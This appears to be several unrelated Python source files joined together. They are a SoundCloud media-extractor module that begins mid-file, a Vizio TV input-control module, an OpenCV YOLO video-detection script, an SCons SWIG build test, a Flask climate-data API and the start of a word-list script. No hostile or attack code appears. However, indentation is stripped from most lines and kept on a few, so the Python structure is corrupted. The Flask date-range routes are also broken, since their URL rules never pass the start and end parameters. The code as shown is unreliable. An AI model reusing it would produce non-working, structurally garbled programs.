'md5': 'e22aecd2bc88e0e4e432d7dcc0a1abf7',
'info_dict': {
'id': '583011102',
'ext': 'mp3',
'title': 'Mezzo Valzer',
'description': 'md5:4138d582f81866a530317bae316e8b61',
'uploader': 'Micronie',
'uploader_id': '3352531',
'timestamp': 1551394171,
'upload_date': '20190228',
'duration': 180.157,
'thumbnail': r're:https?://.*\.jpg',
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
{
# with AAC HQ format available via OAuth token
'url': 'https://soundcloud.com/wandw/the-chainsmokers-ft-daya-dont-let-me-down-ww-remix-1',
'only_matching': True,
},
]
_API_V2_BASE = 'https://api-v2.soundcloud.com/'
_BASE_URL = 'https://soundcloud.com/'
_IMAGE_REPL_RE = r'-([0-9a-z]+)\.jpg'
_ARTWORK_MAP = {
'mini': 16,
'tiny': 20,
'small': 32,
'badge': 47,
't67x67': 67,
'large': 100,
't300x300': 300,
'crop': 400,
't500x500': 500,
'original': 0,
}
def _store_client_id(self, client_id):
self._downloader.cache.store('soundcloud', 'client_id', client_id)
def _update_client_id(self):
webpage = self._download_webpage('https://soundcloud.com/', None)
for src in reversed(re.findall(r'<script[^>]+src="([^"]+)"', webpage)):
script = self._download_webpage(src, None, fatal=False)
if script:
client_id = self._search_regex(
r'client_id\s*:\s*"([0-9a-zA-Z]{32})"',
script, 'client id', default=None)
if client_id:
self._CLIENT_ID = client_id
self._store_client_id(client_id)
return
raise ExtractorError('Unable to extract client id')
def _generate_prerelease_file(self):
self._update_client_id()
return 'prerelease_client_id = {!r}\n'.format(self._CLIENT_ID)
def _download_json(self, *args, **kwargs):
non_fatal = kwargs.get('fatal') is False
if non_fatal:
del kwargs['fatal']
query = kwargs.get('query', {}).copy()
for _ in range(2):
query['client_id'] = self._CLIENT_ID
kwargs['query'] = query
try:
return super(SoundcloudIE, self)._download_json(*args, **compat_kwargs(kwargs))
except ExtractorError as e:
if isinstance(e.cause, compat_HTTPError) and e.cause.code == 401:
self._store_client_id(None)
self._update_client_id()
continue
elif non_fatal:
self._downloader.report_warning(error_to_compat_str(e))
return False
raise
def _real_initialize(self):
self._CLIENT_ID = self._downloader.cache.load('soundcloud', 'client_id') or prerelease_client_id or 'YUKXoArFcqrlQn9tfNHvvyfnDISj04zk'
@classmethod
def _resolv_url(cls, url):
return SoundcloudIE._API_V2_BASE + 'resolve?url=' + url
def _extract_info_dict(self, info, full_title=None, secret_token=None):
track_id = compat_str(info['id'])
title = info['title']
format_urls = set()
formats = []
query = {'client_id': self._CLIENT_ID}
if secret_token:
query['secret_token'] = secret_token
if info.get('downloadable') and info.get('has_downloads_left'):
download_url = update_url_query(
self._API_V2_BASE + 'tracks/' + track_id + '/download', query)
redirect_url = (self._download_json(download_url, track_id, fatal=False) or {}).get('redirectUri')
if redirect_url:
urlh = self._request_webpage(
HEADRequest(redirect_url), track_id, fatal=False)
if urlh:
format_url = urlh.geturl()
format_urls.add(format_url)
formats.append({
'format_id': 'download',
'ext': urlhandle_detect_ext(urlh) or 'mp3',
'filesize': int_or_none(urlh.headers.get('Content-Length')),
'url': format_url,
'preference': 10,
})
def invalid_url(url):
return not url or url in format_urls
def add_format(f, protocol, is_preview=False):
mobj = re.search(r'\.(?P<abr>\d+)\.(?P<ext>[0-9a-z]{3,4})(?=[/?])', stream_url)
if mobj:
for k, v in mobj.groupdict().items():
if not f.get(k):
f[k] = v
format_id_list = []
if protocol:
format_id_list.append(protocol)
ext = f.get('ext')
if ext == 'aac':
f['abr'] = '256'
for k in ('ext', 'abr'):
v = f.get(k)
if v:
format_id_list.append(v)
preview = is_preview or re.search(r'/(?:preview|playlist)/0/30/', f['url'])
if preview:
format_id_list.append('preview')
abr = f.get('abr')
if abr:
f['abr'] = int(abr)
if protocol == 'hls':
protocol = 'm3u8' if ext == 'aac' else 'm3u8_native'
else:
protocol = 'http'
f.update({
'format_id': '_'.join(format_id_list),
'protocol': protocol,
'preference': -10 if preview else None,
})
formats.append(f)
# New API
transcodings = try_get(
info, lambda x: x['media']['transcodings'], list) or []
for t in transcodings:
if not isinstance(t, dict):
continue
format_url = url_or_none(t.get('url'))
if not format_url:
continue
stream = self._download_json(
format_url, track_id, query=query, fatal=False)
if not isinstance(stream, dict):
continue
stream_url = url_or_none(stream.get('url'))
if invalid_url(stream_url):
continue
format_urls.add(stream_url)
stream_format = t.get('format') or {}
protocol = stream_format.get('protocol')
if protocol != 'hls' and '/hls' in format_url:
protocol = 'hls'
ext = None
preset = str_or_none(t.get('preset'))
if preset:
ext = preset.split('_')[0]
if ext not in KNOWN_EXTENSIONS:
ext = mimetype2ext(stream_format.get('mime_type'))
add_format({
'url': stream_url,
'ext': ext,
}, 'http' if protocol == 'progressive' else protocol,
t.get('snipped') or '/preview/' in format_url)
for f in formats:
f['vcodec'] = 'none'
if not formats and info.get('policy') == 'BLOCK':
self.raise_geo_restricted()
self._sort_formats(formats)
user = info.get('user') or {}
thumbnails = []
artwork_url = info.get('artwork_url')
thumbnail = artwork_url or user.get('avatar_url')
if isinstance(thumbnail, compat_str):
if re.search(self._IMAGE_REPL_RE, thumbnail):
for image_id, size in self._ARTWORK_MAP.items():
i = {
'id': image_id,
'url': re.sub(self._IMAGE_REPL_RE, '-%s.jpg' % image_id, thumbnail),
}
if image_id == 'tiny' and not artwork_url:
size = 18
elif image_id == 'original':
i['preference'] = 10
if size:
i.update({
'width': size,
'height': size,
})
thumbnails.append(i)
else:
thumbnails = [{'url': thumbnail}]
def extract_count(key):
return int_or_none(info.get('%s_count' % key))
return {
'id': track_id,
'uploader': user.get('username'),
'uploader_id': str_or_none(user.get('id')) or user.get('permalink'),
'uploader_url': user.get('permalink_url'),
'timestamp': unified_timestamp(info.get('created_at')),
'title': title,
'description': info.get('description'),
'thumbnails': thumbnails,
'duration': float_or_none(info.get('duration'), 1000),
'webpage_url': info.get('permalink_url'),
'license': info.get('license'),
'view_count': extract_count('playback'),
'like_count': extract_count('favoritings') or extract_count('likes'),
'comment_count': extract_count('comment'),
'repost_count': extract_count('reposts'),
'genre': info.get('genre'),
'formats': formats
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
track_id = mobj.group('track_id')
query = {}
if track_id:
info_json_url = self._API_V2_BASE + 'tracks/' + track_id
full_title = track_id
token = mobj.group('secret_token')
if token:
query['secret_token'] = token
else:
full_title = resolve_title = '%s/%s' % mobj.group('uploader', 'title')
token = mobj.group('token')
if token:
resolve_title += '/%s' % token
info_json_url = self._resolv_url(self._BASE_URL + resolve_title)
info = self._download_json(
info_json_url, full_title, 'Downloading info JSON', query=query)
return self._extract_info_dict(info, full_title, token)
class SoundcloudPlaylistBaseIE(SoundcloudIE):
def _extract_set(self, playlist, token=None):
playlist_id = compat_str(playlist['id'])
tracks = playlist.get('tracks') or []
if not all([t.get('permalink_url') for t in tracks]) and token:
tracks = self._download_json(
self._API_V2_BASE + 'tracks', playlist_id,
'Downloading tracks', query={
'ids': ','.join([compat_str(t['id']) for t in tracks]),
'playlistId': playlist_id,
'playlistSecretToken': token,
})
entries = []
for track in tracks:
track_id = str_or_none(track.get('id'))
url = track.get('permalink_url')
if not url:
if not track_id:
continue
url = self._API_V2_BASE + 'tracks/' + track_id
if token:
url += '?secret_token=' + token
entries.append(self.url_result(
url, SoundcloudIE.ie_key(), track_id))
return self.playlist_result(
entries, playlist_id,
playlist.get('title'),
playlist.get('description'))
class SoundcloudSetIE(SoundcloudPlaylistBaseIE):
_VALID_URL = r'https?://(?:(?:www|m)\.)?soundcloud\.com/(?P<uploader>[\w\d-]+)/sets/(?P<slug_title>[\w\d-]+)(?:/(?P<token>[^?/]+))?'
IE_NAME = 'soundcloud:set'
_TESTS = [{
'url': 'https://soundcloud.com/the-concept-band/sets/the-royal-concept-ep',
'info_dict': {
'id': '2284613',
'title': 'The Royal Concept EP',
'description': 'md5:71d07087c7a449e8941a70a29e34671e',
},
'playlist_mincount': 5,
}, {
'url': 'https://soundcloud.com/the-concept-band/sets/the-royal-concept-ep/token',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
full_title = '%s/sets/%s' % mobj.group('uploader', 'slug_title')
token = mobj.group('token')
if token:
full_title += '/' + token
info = self._download_json(self._resolv_url(
self._BASE_URL + full_title), full_title)
if 'errors' in info:
msgs = (compat_str(err['error_message']) for err in info['errors'])
raise ExtractorError('unable to download video webpage: %s' % ','.join(msgs))
return self._extract_set(info, token)
class SoundcloudPagedPlaylistBaseIE(SoundcloudIE):
def _extract_playlist(self, base_url, playlist_id, playlist_title):
        # Per the SoundCloud documentation, the maximum limit for a linked partitioning query is 200.
# https://developers.soundcloud.com/blog/offset-pagination-deprecated
COMMON_QUERY = {
'limit': 200,
'linked_partitioning': '1',
}
query = COMMON_QUERY.copy()
query['offset'] = 0
next_href = base_url
entries = []
for i in itertools.count():
response = self._download_json(
next_href, playlist_id,
'Downloading track page %s' % (i + 1), query=query)
collection = response['collection']
if not isinstance(collection, list):
collection = []
# Empty collection may be returned, in this case we proceed
# straight to next_href
def resolve_entry(candidates):
for cand in candidates:
if not isinstance(cand, dict):
continue
permalink_url = url_or_none(cand.get('permalink_url'))
if not permalink_url:
continue
return self.url_result(
permalink_url,
SoundcloudIE.ie_key() if SoundcloudIE.suitable(permalink_url) else None,
str_or_none(cand.get('id')), cand.get('title'))
for e in collection:
entry = resolve_entry((e, e.get('track'), e.get('playlist')))
if entry:
entries.append(entry)
            next_href = response.get('next_href')
            if not next_href:
                break
parsed_next_href = compat_urlparse.urlparse(next_href)
query = compat_urlparse.parse_qs(parsed_next_href.query)
query.update(COMMON_QUERY)
return {
'_type': 'playlist',
'id': playlist_id,
'title': playlist_title,
'entries': entries,
}
class SoundcloudUserIE(SoundcloudPagedPlaylistBaseIE):
_VALID_URL = r'''(?x)
https?://
(?:(?:www|m)\.)?soundcloud\.com/
(?P<user>[^/]+)
(?:/
(?P<rsrc>tracks|albums|sets|reposts|likes|spotlight)
)?
/?(?:[?#].*)?$
'''
IE_NAME = 'soundcloud:user'
_TESTS = [{
'url': 'https://soundcloud.com/soft-cell-official',
'info_dict': {
'id': '207965082',
'title': 'Soft Cell (All)',
},
'playlist_mincount': 28,
}, {
'url': 'https://soundcloud.com/soft-cell-official/tracks',
'info_dict': {
'id': '207965082',
'title': 'Soft Cell (Tracks)',
},
'playlist_mincount': 27,
}, {
'url': 'https://soundcloud.com/soft-cell-official/albums',
'info_dict': {
'id': '207965082',
'title': 'Soft Cell (Albums)',
},
'playlist_mincount': 1,
}, {
'url': 'https://soundcloud.com/jcv246/sets',
'info_dict': {
'id': '12982173',
'title': 'Jordi / cv (Sets)',
},
'playlist_mincount': 2,
}, {
'url': 'https://soundcloud.com/jcv246/reposts',
'info_dict': {
'id': '12982173',
'title': 'Jordi / cv (Reposts)',
},
'playlist_mincount': 6,
}, {
'url': 'https://soundcloud.com/clalberg/likes',
'info_dict': {
'id': '11817582',
'title': 'clalberg (Likes)',
},
'playlist_mincount': 5,
}, {
'url': 'https://soundcloud.com/grynpyret/spotlight',
'info_dict': {
'id': '7098329',
'title': 'Grynpyret (Spotlight)',
},
'playlist_mincount': 1,
}]
_BASE_URL_MAP = {
'all': 'stream/users/%s',
'tracks': 'users/%s/tracks',
'albums': 'users/%s/albums',
'sets': 'users/%s/playlists',
'reposts': 'stream/users/%s/reposts',
'likes': 'users/%s/likes',
'spotlight': 'users/%s/spotlight',
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
uploader = mobj.group('user')
user = self._download_json(
self._resolv_url(self._BASE_URL + uploader),
uploader, 'Downloading user info')
resource = mobj.group('rsrc') or 'all'
return self._extract_playlist(
self._API_V2_BASE + self._BASE_URL_MAP[resource] % user['id'],
str_or_none(user.get('id')),
'%s (%s)' % (user['username'], resource.capitalize()))
class SoundcloudTrackStationIE(SoundcloudPagedPlaylistBaseIE):
_VALID_URL = r'https?://(?:(?:www|m)\.)?soundcloud\.com/stations/track/[^/]+/(?P<id>[^/?#&]+)'
IE_NAME = 'soundcloud:trackstation'
_TESTS = [{
'url': 'https://soundcloud.com/stations/track/officialsundial/your-text',
'info_dict': {
'id': '286017854',
'title': 'Track station: your text',
},
'playlist_mincount': 47,
}]
def _real_extract(self, url):
track_name = self._match_id(url)
track = self._download_json(self._resolv_url(url), track_name)
track_id = self._search_regex(
r'soundcloud:track-stations:(\d+)', track['id'], 'track id')
return self._extract_playlist(
self._API_V2_BASE + 'stations/%s/tracks' % track['id'],
track_id, 'Track station: %s' % track['title'])
class SoundcloudPlaylistIE(SoundcloudPlaylistBaseIE):
_VALID_URL = r'https?://api(?:-v2)?\.soundcloud\.com/playlists/(?P<id>[0-9]+)(?:/?\?secret_token=(?P<token>[^&]+?))?$'
IE_NAME = 'soundcloud:playlist'
_TESTS = [{
'url': 'https://api.soundcloud.com/playlists/4110309',
'info_dict': {
'id': '4110309',
'title': 'TILT Brass - Bowery Poetry Club, August \'03 [Non-Site SCR 02]',
'description': 're:.*?TILT Brass - Bowery Poetry Club',
},
'playlist_count': 6,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
playlist_id = mobj.group('id')
query = {}
token = mobj.group('token')
if token:
query['secret_token'] = token
data = self._download_json(
self._API_V2_BASE + 'playlists/' + playlist_id,
playlist_id, 'Downloading playlist', query=query)
return self._extract_set(data, token)
class SoundcloudSearchIE(SearchInfoExtractor, SoundcloudIE):
IE_NAME = 'soundcloud:search'
IE_DESC = 'Soundcloud search'
_MAX_RESULTS = float('inf')
_TESTS = [{
'url': 'scsearch15:post-avant jazzcore',
'info_dict': {
'title': 'post-avant jazzcore',
},
'playlist_count': 15,
}]
_SEARCH_KEY = 'scsearch'
_MAX_RESULTS_PER_PAGE = 200
_DEFAULT_RESULTS_PER_PAGE = 50
def _get_collection(self, endpoint, collection_id, **query):
limit = min(
query.get('limit', self._DEFAULT_RESULTS_PER_PAGE),
self._MAX_RESULTS_PER_PAGE)
query.update({
'limit': limit,
'linked_partitioning': 1,
'offset': 0,
})
next_url = update_url_query(self._API_V2_BASE + endpoint, query)
collected_results = 0
for i in itertools.count(1):
response = self._download_json(
next_url, collection_id, 'Downloading page {0}'.format(i),
'Unable to download API page')
collection = response.get('collection', [])
if not collection:
break
collection = list(filter(bool, collection))
collected_results += len(collection)
for item in collection:
yield self.url_result(item['uri'], SoundcloudIE.ie_key())
if not collection or collected_results >= limit:
break
next_url = response.get('next_href')
if not next_url:
break
def _get_n_results(self, query, n):
tracks = self._get_collection('search/tracks', query, limit=n, q=query)
return self.playlist_result(tracks, playlist_title=query)
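# A small standalone check (not part of the extractor) of which of the URL patterns
# above claims which kind of link; the URLs themselves are illustrative.
if __name__ == '__main__':
    for candidate in ('https://soundcloud.com/some-artist/some-track',
                      'https://soundcloud.com/some-artist/sets/some-ep',
                      'https://api.soundcloud.com/playlists/4110309'):
        for ie in (SoundcloudIE, SoundcloudSetIE, SoundcloudPlaylistIE):
            if re.match(ie._VALID_URL, candidate):
                print('%s -> %s' % (candidate, ie.__name__))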
|
"""Vizio SmartCast API commands and class for device inputs."""
from typing import Any, Dict, List, Optional
from pyvizio.api._protocol import ResponseKey
from pyvizio.api.item import Item, ItemCommandBase, ItemInfoCommandBase
from pyvizio.helpers import dict_get_case_insensitive
class InputItem(Item):
"""Input device."""
def __init__(self, json_item: Dict[str, Any], is_extended_metadata: bool) -> None:
"""Initialize input device."""
super(InputItem, self).__init__(json_item)
self.meta_name = None
self.meta_data = None
meta = dict_get_case_insensitive(json_item, ResponseKey.VALUE)
if meta:
if is_extended_metadata:
self.meta_name = dict_get_case_insensitive(meta, ResponseKey.NAME)
self.meta_data = dict_get_case_insensitive(meta, ResponseKey.METADATA)
else:
self.meta_name = meta
if not self.meta_name:
self.meta_name = self.c_name
class GetInputsListCommand(ItemInfoCommandBase):
"""Command to get list of available inputs."""
def __init__(self, device_type: str) -> None:
"""Initialize command to get list of available inputs."""
super(GetInputsListCommand, self).__init__(device_type, "INPUTS")
def process_response(self, json_obj: Dict[str, Any]) -> Optional[List[InputItem]]:
"""Return response to command to get list of available inputs."""
items = dict_get_case_insensitive(json_obj, ResponseKey.ITEMS)
if items:
return [
InputItem(itm, True)
for itm in items
if dict_get_case_insensitive(itm, ResponseKey.CNAME) != "current_input"
]
return None
class GetCurrentInputCommand(ItemInfoCommandBase):
"""Command to get currently active input."""
def __init__(self, device_type: str) -> None:
"""Initialize command to get currently active input."""
super(GetCurrentInputCommand, self).__init__(device_type, "CURRENT_INPUT")
def process_response(self, json_obj: Dict[str, Any]) -> Optional[InputItem]:
"""Return response to command to get currently active input."""
items = dict_get_case_insensitive(json_obj, ResponseKey.ITEMS)
v_input = None
if items:
v_input = InputItem(items[0], False)
return v_input
class ChangeInputCommand(ItemCommandBase):
"""Command to change active input by name."""
def __init__(self, device_type: str, id: int, name: str) -> None:
"""Initialize command to change active input by name."""
super(ChangeInputCommand, self).__init__(device_type, "CURRENT_INPUT", id, name)
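# Usage note (an assumption about the calling client, not defined in this file):
# GetInputsListCommand(device_type) enumerates inputs, GetCurrentInputCommand(
# device_type) reads the active one, and ChangeInputCommand(device_type, id, name)
# switches input, where id is expected to be the current input's hash value and
# name the target input's c_name.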
|
# -*- coding: utf-8 -*-
"""
@author: abhilash
"""
import numpy as np
import cv2
#open the video file stream
file_video_stream = cv2.VideoCapture('images/testing/video_sample2.mp4')
#create a while loop
while file_video_stream.isOpened():
    #get the current frame from video stream
    ret,current_frame = file_video_stream.read()
    #stop when the stream ends or the frame could not be read
    if not ret:
        break
    #use the current video frame instead of a static image
    img_to_detect = current_frame
img_height = img_to_detect.shape[0]
img_width = img_to_detect.shape[1]
# convert to blob to pass into model
img_blob = cv2.dnn.blobFromImage(img_to_detect, 0.003922, (416, 416), swapRB=True, crop=False)
    #recommended by yolo authors, scale factor is 0.003922=1/255; width,height of the blob here is 416,416
    #accepted sizes are 320x320, 416x416 and 608x608. A bigger size means more accuracy but less speed
# set of 80 class labels
class_labels = ["person","bicycle","car","motorcycle","airplane","bus","train","truck","boat",
"trafficlight","firehydrant","stopsign","parkingmeter","bench","bird","cat",
"dog","horse","sheep","cow","elephant","bear","zebra","giraffe","backpack",
"umbrella","handbag","tie","suitcase","frisbee","skis","snowboard","sportsball",
"kite","baseballbat","baseballglove","skateboard","surfboard","tennisracket",
"bottle","wineglass","cup","fork","knife","spoon","bowl","banana","apple",
"sandwich","orange","broccoli","carrot","hotdog","pizza","donut","cake","chair",
"sofa","pottedplant","bed","diningtable","toilet","tvmonitor","laptop","mouse",
"remote","keyboard","cellphone","microwave","oven","toaster","sink","refrigerator",
"book","clock","vase","scissors","teddybear","hairdrier","toothbrush"]
#Declare List of colors as an array
#Green, Blue, Red, cyan, yellow, purple
#Split based on ',' and for every split, change type to int
#convert that to a numpy array to apply color mask to the image numpy array
class_colors = ["0,255,0","0,0,255","255,0,0","255,255,0","0,255,255"]
class_colors = [np.array(every_color.split(",")).astype("int") for every_color in class_colors]
class_colors = np.array(class_colors)
class_colors = np.tile(class_colors,(16,1))
# Loading pretrained model
# input preprocessed blob into model and pass through the model
# obtain the detection predictions by the model using forward() method
yolo_model = cv2.dnn.readNetFromDarknet('model/yolov3.cfg','model/yolov3.weights')
# Get all layers from the yolo network
# Loop and find the last layer (output layer) of the yolo network
yolo_layers = yolo_model.getLayerNames()
yolo_output_layer = [yolo_layers[yolo_layer[0] - 1] for yolo_layer in yolo_model.getUnconnectedOutLayers()]
# input preprocessed blob into model and pass through the model
yolo_model.setInput(img_blob)
# obtain the detection layers by forwarding through till the output layer
obj_detection_layers = yolo_model.forward(yolo_output_layer)
############## NMS Change 1 ###############
# initialization for non-max suppression (NMS)
    # declare lists for class ids, box geometry (center, width & height) and confidences
class_ids_list = []
boxes_list = []
confidences_list = []
############## NMS Change 1 END ###########
# loop over each of the layer outputs
for object_detection_layer in obj_detection_layers:
# loop over the detections
for object_detection in object_detection_layer:
            # object_detection[0:4] => box center x, center y, width and height (relative to the blob size)
            # object_detection[5:] => confidence scores for each class within the bounding box
all_scores = object_detection[5:]
predicted_class_id = np.argmax(all_scores)
prediction_confidence = all_scores[predicted_class_id]
# take only predictions with confidence more than 20%
if prediction_confidence > 0.20:
#get the predicted label
predicted_class_label = class_labels[predicted_class_id]
                #obtain the bounding box coordinates for the actual image from the resized image size
bounding_box = object_detection[0:4] * np.array([img_width, img_height, img_width, img_height])
(box_center_x_pt, box_center_y_pt, box_width, box_height) = bounding_box.astype("int")
start_x_pt = int(box_center_x_pt - (box_width / 2))
start_y_pt = int(box_center_y_pt - (box_height / 2))
############## NMS Change 2 ###############
#save class id, start x, y, width & height, confidences in a list for nms processing
#make sure to pass confidence as float and width and height as integers
class_ids_list.append(predicted_class_id)
confidences_list.append(float(prediction_confidence))
boxes_list.append([start_x_pt, start_y_pt, int(box_width), int(box_height)])
############## NMS Change 2 END ###########
############## NMS Change 3 ###############
# Applying the NMS will return only the selected max value ids while suppressing the non maximum (weak) overlapping bounding boxes
    # Non-Maxima Suppression confidence set as 0.5 & max suppression threshold for NMS as 0.4 (adjust and try for better performance)
max_value_ids = cv2.dnn.NMSBoxes(boxes_list, confidences_list, 0.5, 0.4)
# loop through the final set of detections remaining after NMS and draw bounding box and write text
for max_valueid in max_value_ids:
max_class_id = max_valueid[0]
box = boxes_list[max_class_id]
start_x_pt = box[0]
start_y_pt = box[1]
box_width = box[2]
box_height = box[3]
#get the predicted class id and label
predicted_class_id = class_ids_list[max_class_id]
predicted_class_label = class_labels[predicted_class_id]
prediction_confidence = confidences_list[max_class_id]
############## NMS Change 3 END ###########
end_x_pt = start_x_pt + box_width
end_y_pt = start_y_pt + box_height
#get a random mask color from the numpy array of colors
box_color = class_colors[predicted_class_id]
#convert the color numpy array as a list and apply to text and box
box_color = [int(c) for c in box_color]
# print the prediction in console
predicted_class_label = "{}: {:.2f}%".format(predicted_class_label, prediction_confidence * 100)
print("predicted object {}".format(predicted_class_label))
# draw rectangle and text in the image
cv2.rectangle(img_to_detect, (start_x_pt, start_y_pt), (end_x_pt, end_y_pt), box_color, 1)
cv2.putText(img_to_detect, predicted_class_label, (start_x_pt, start_y_pt-5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, box_color, 1)
cv2.imshow("Detection Output", img_to_detect)
#terminate while loop if 'q' key is pressed
if cv2.waitKey(1) & 0xFF == ord('q'):
break
#releasing the stream and the camera
#close all opencv windows
file_video_stream.release()
cv2.destroyAllWindows()
|
#!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Make sure SWIG works when a VariantDir (or variant_dir) is used.
Test case courtesy Joe Maruszewski.
"""
import sys
import TestSCons
test = TestSCons.TestSCons()
swig = test.where_is('swig')
if not swig:
test.skip_test('Can not find installed "swig", skipping test.\n')
# swig-python expects specific filenames.
# the platform specific suffix won't necessarily work.
if sys.platform == 'win32':
_dll = '.dll'
else:
_dll = '.so'
test.subdir(['source'])
python, python_include, python_libpath, python_lib = \
test.get_platform_python_info(python_h_required=True)
if sys.platform == 'win32' and sys.maxsize <= 2**32:
swig_arch_var="TARGET_ARCH='x86',"
else:
swig_arch_var=""
test.write(['SConstruct'], """\
#
# Create the build environment.
#
env = Environment(CPPPATH = [".", r'%(python_include)s'],
%(swig_arch_var)s
CPPDEFINES = "NDEBUG",
SWIG = [r'%(swig)s'],
SWIGFLAGS = ["-python", "-c++"],
SWIGCXXFILESUFFIX = "_wrap.cpp",
LDMODULEPREFIX='_',
LDMODULESUFFIX='%(_dll)s',
LIBPATH=[r'%(python_libpath)s'],
LIBS='%(python_lib)s',
)
Export("env")
#
# Build the libraries.
#
SConscript("source/SConscript", variant_dir = "build")
""" % locals())
test.write(['source', 'SConscript'], """\
Import("env")
lib = env.SharedLibrary("_linalg",
"linalg.i",
SHLIBPREFIX = "",
SHLIBSUFFIX = ".pyd")
""")
test.write(['source', 'Vector.hpp'], """\
class Vector
{
public:
Vector(int size = 0) : _size(size)
{
_v = new double[_size];
for (int i = 0; i < _size; ++i)
_v[i] = 0.0;
}
~Vector() { delete [] _v; }
int size() const { return _size; }
double& operator[](int key) { return _v[key]; }
double const& operator[](int key) const { return _v[key]; }
private:
int _size;
double* _v;
};
""")
test.write(['source', 'linalg.i'], """\
%module linalg
%{
#include <sstream>
#include "Vector.hpp"
%}
class Vector
{
public:
Vector(int n = 0);
~Vector();
%extend
{
const char* __str__() { return "linalg.Vector()"; }
%pythoncode %{
def __iter__(self):
for s in self:
yield s
%}
}
};
""")
## _python_ = TestSCons._python_
## XXX: @ptomulik: looks like it was unused?
## test.write(['source', 'test.py'], """\
## #!%(_python_)s
## from __future__ import print_function
##
## import linalg
##
##
## x = linalg.Vector(5)
## print(x)
##
## x[1] = 99.5
## x[3] = 8.3
## x[4] = 11.1
##
##
## for i, v in enumerate(x):
## print("\tx[%%d] = %%g" %% (i, v))
##
## """ % locals())
test.run(arguments = '.')
test.up_to_date(arguments = '.')
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
import numpy as np
import datetime as dt
import pandas as pd
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func, inspect
from flask import Flask, jsonify
#################################################
# Database Setup
#################################################
engine = create_engine("sqlite:///Resources/hawaii.sqlite")
# reflect an existing database into a new model
Base = automap_base()
# reflect the tables
Base.prepare(engine, reflect=True)
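# Note: Base.prepare(engine, reflect=True) is the SQLAlchemy 1.x idiom; on
# SQLAlchemy 2.0 the equivalent call would be Base.prepare(autoload_with=engine).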
# Save reference to the table
Measurement = Base.classes.measurement
Station = Base.classes.station
# Session link from python to DB
session = Session(engine)
#################################################
# Flask Setup
#################################################
app = Flask(__name__)
#################################################
# Flask Routes
#################################################
@app.route("/")
def welcome():
"""List all available api routes."""
return (
f"Welcome to the Hawaii Climate Analysis API!<br/>"
f"Available Routes:<br/>"
f"/api/v1.0/precipitation<br/>"
f"/api/v1.0/stations<br/>"
f"/api/v1.0/tobs<br/>"
f"/api/v1.0/temp/start<br/>"
f"/api/v1.0/temp/start/end"
)
@app.route("/api/v1.0/precipitation")
def precipitation():
session = Session(engine)
data = session.query(Measurement.date, Measurement.prcp).\
order_by(Measurement.date).all()
precip_dates = []
for date, prcp in data:
new_dict = {}
new_dict[date] = prcp
precip_dates.append(new_dict)
session.close()
return jsonify(precip_dates)
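# The precipitation route returns one {date: prcp} object per row, for example
# (values illustrative only): [{"2016-08-23": 0.0}, {"2016-08-24": 0.08}, ...]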
@app.route("/api/v1.0/stations")
def stations():
    # use a request-scoped session rather than the module-level one
    session = Session(engine)
    results = session.query(Station.station).all()
stations = list(np.ravel(results))
session.close()
return jsonify(stations)
@app.route("/api/v1.0/tobs")
def tobs():
    # use a request-scoped session rather than the module-level one
    session = Session(engine)
    lastdate = session.query(Measurement.date).order_by(
        Measurement.date.desc()).first()
last_date = dt.datetime.strptime(lastdate[0], '%Y-%m-%d')
query_date = dt.date(last_date.year, last_date.month,
last_date.day) - dt.timedelta(days=365)
results = session.query(Measurement.date, Measurement.tobs).filter(
Measurement.date >= query_date).all()
all_tobs = []
for row in results:
tobs_dict = {}
tobs_dict["date"] = row.date
tobs_dict["tobs"] = row.tobs
all_tobs.append(tobs_dict)
session.close()
return jsonify(all_tobs)
@app.route("/api/v1.0/temp/start")
def stats():
start_date = session.query(func.min(Measurement.date)).all()[0][0]
sel = [func.min(Measurement.tobs),func.avg(Measurement.tobs),func.max(Measurement.tobs)]
temp_lstuple = session.query(*sel).filter(Measurement.date >= start_date).all()
session.close()
temp_pram1_list = list(np.ravel(temp_lstuple))
temp_list =[]
for t in temp_lstuple:
temp_dict = {}
temp_dict["Min Temp"] = temp_pram1_list[0]
temp_dict["Avg Temp"] = temp_pram1_list[1]
temp_dict["Max Temp"] = temp_pram1_list[2]
temp_list.append(temp_dict)
return jsonify(temp_list)
@app.route("/api/v1.0/temp/start/end")
def tempstartend(start=None, end=None):
sel = [func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)]
temps_q = session.query(*sel).filter(Measurement.date >= start).filter(Measurement.date <= end).all()
temps = list(np.ravel(temps_q))
return jsonify(temps)
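# Example request against this route (dates illustrative only):
#   GET /api/v1.0/temp/2016-08-01/2016-08-07  ->  [minimum, average, maximum]
# returned as a JSON list of the three temperature aggregates for that date range.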
if __name__ == '__main__':
app.run(debug=True)
|
# from urllib import urlopen
import random
# got the list from here, no point grabbing it each time though...
# webpage = urlopen('http://dictionary-thesaurus.com/wordlists/Nouns%285,449%29.txt').read()
# word_list = webpage.splitlines()
